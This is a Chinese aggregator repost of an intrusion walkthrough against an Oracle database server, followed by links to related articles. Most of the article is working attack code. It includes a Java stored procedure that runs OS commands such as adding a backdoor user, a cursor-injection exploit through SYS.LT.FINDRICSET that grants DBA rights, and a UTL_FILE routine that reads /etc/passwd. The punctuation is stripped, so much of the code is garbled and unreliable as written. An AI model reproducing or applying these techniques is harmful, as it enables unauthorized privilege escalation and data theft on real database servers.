知识大全 入侵Oracle服务器进一步获取权限

Posted 权限

篇首语:知识的确是天空中伟大的太阳,它那万道光芒投下了生命,投下了力量。本文由小常识网(cha138.com)小编为大家整理,主要介绍了知识大全 入侵Oracle服务器进一步获取权限相关的知识,希望对你有一定的参考价值。

入侵Oracle服务器进一步获取权限  以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!

  很快便连接上oracle服务器 此时发现

   连接后不是dba权限

   不能利用SYS DBMS_EXPORT_EXTENSION GET_DOMAIN_INDEX_TABLES漏洞提升权限

   运行SELECT UTL_HTTP request( ) FROM dual 后发现oracle服务器不能连接网络

  幸运的是

  运行

  create or replace function Linx_Query (p varchar ) return number authid current_user is begin execute immediate p; return ;end;

  成功!这个用户具有create proceduce权限

  此时马上想到创建java扩展执行命令

  create or replace and pile java source named LinxUtil as import java io *; public class LinxUtil extends Object public static String runCMD(String args) tryBufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime getRuntime() exec(args) getInputStream() ) ); String stemp str= ;while ((stemp = myReader readLine()) != null) str +=stemp+ ;myReader close();return str; catch (Exception e)return e toString();

  begin dbms_java grant_permission( PUBLIC SYS:java io FilePermission <> execute );end;

  create or replace function LinxRunCMD(p_cmd in varchar ) return varchar as language java name LinxUtil runCMD(java lang String) return String

  select * from all_objects where object_name like %LINX%

  grant all on LinxRunCMD to public

  select LinxRunCMD( cmd /c net user linx /add ) from dual

  但是在第一步就卡住了 服务器由于某种未知原因 不能创建java扩展!!

  还好 我们还有UTL库可以利用

  create or replace function LinxUTLReadfile (filename varchar ) return varchar is

  fHandler UTL_FILE FILE_TYPE;

  buf varchar ( );

  output varchar ( );

  BEGIN

  fHandler := UTL_FILE FOPEN( UTL_FILE_DIR filename r );

  loop

  begin

  utl_file get_line(fHandler buf);

  DBMS_OUTPUT PUT_LINE( Cursor: ||buf);

  exception

  when no_data_found then exit;

  end;

  output := output||buf||chr( );

  end loop;

  UTL_FILE FCLOSE(fHandler);

  return output;

  END;

  UTL_FILE_DIR需要先用

  CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS /etc ;

  指定目 但运行后发现没有权限 只好想办法提权

  ***************游标注射***************

  老外写了N个pdf介绍这技术 我精简了代码

  DECLARE

  MYC NUMBER;

  BEGIN

  MYC := DBMS_SQL OPEN_CURSOR;

  DBMS_SQL PARSE(MYC declare pragma autonomous_transaction; begin execute immediate GRANT DBA TO linxlinx_current_db_user ;mit;end; );

  DBMS_OUTPUT PUT_LINE( Cursor: ||MYC);

  BEGIN SYS LT FINDRICSET( ||dbms_sql execute( ||MYC|| )|| )– x ); END;

  raise NO_DATA_FOUND;

  EXCEPTION

  WHEN NO_DATA_FOUND THEN DBMS_OUTPUT PUT_LINE( Cursor: ||MYC);

  WHEN OTHERS THEN DBMS_OUTPUT PUT_LINE( Cursor: ||MYC);

  END;

  运行后重新连接就有dba权限了 简单吧……

  现在可以读取文件了

  CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS /etc ;

  select LinxUTLReadfile( passwd ) from dual

cha138/Article/program/Oracle/201311/16747

相关参考

知识大全 MS SQL数据库SA权限入侵的感悟

MSSQL数据库SA权限入侵的感悟  以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!  想必大家都知道

知识大全 PHP 获取文件权限函数介绍

PHP获取文件权限函数介绍  以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!以下是对PHP中的获取文件

知识大全 华为荣耀畅玩4如何获取root权限

华为荣耀畅玩4如何获取root权限?如何禁止软件自启和卸载预装软件?很简单,下一个PC版的应用宝来弄就好了。具体方法也告诉你,下了后,打开,然后把手机连到电脑,它能自动识别你的手机,就在应用宝页面右下

知识大全 我的华为3x手机有4个病毒 还不能卸载权限也获取不了该怎么办

我的华为3x手机有4个病毒还不能卸载权限也获取不了该怎么办?华为手机获取ROOT权限后,无法正常卸载预装软件,一般是权限不足导致的,手机自带的系统软件都是存在于系统分区中的,因此不能使用一般的方式卸载

知识大全 手机获取root权限后恢复出厂设置开不了机如何恢复

手机获取root权限后恢复出厂设置开不了机如何恢复1、首先在电脑上下载并安装好AndroidSDK程序,具体下载地址和安装配置方法请直接上AndroidSDK官网;2、将USB数据线将手机连接到电脑上

知识大全 Oracle角色权限管理

Oracle角色权限管理  以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!  对于Oracle系统管理

知识大全 我的手机是红米note移动4G增强版,为什么获取root权限失败

我的手机是红米note移动4G增强版,为什么获取root权限失败?哪位大神知道!  以下文字资料是由(历史新知网www.cha138.com)小编为大家搜集整理后发布的内容,让我们

知识大全 Oracle用户权限查询

Oracle用户权限查询  以下文字资料是由(全榜网网www.cha138.com)小编为大家搜集整理后发布的内容,让我们赶快一起来看一下吧!  查看所有用户  sele

知识大全 安卓系统7.0,怎么获取root权限。试了好多次root软件,一个都不行,为什么

安卓系统7.0,怎么获取root权限。试了好多次root软件,一个都不行,为什么稳定点的root软件就可以对手机root。电脑上的应用宝可可以帮忙对手机root。usb调试打开后,使用数据线把手机连接

知识大全 oracle创建用户、权限、表空间

  Sql代码  createuserusernameidentifiedbypassword; 创建用户  grantdbatousername; 权限  dropuseruse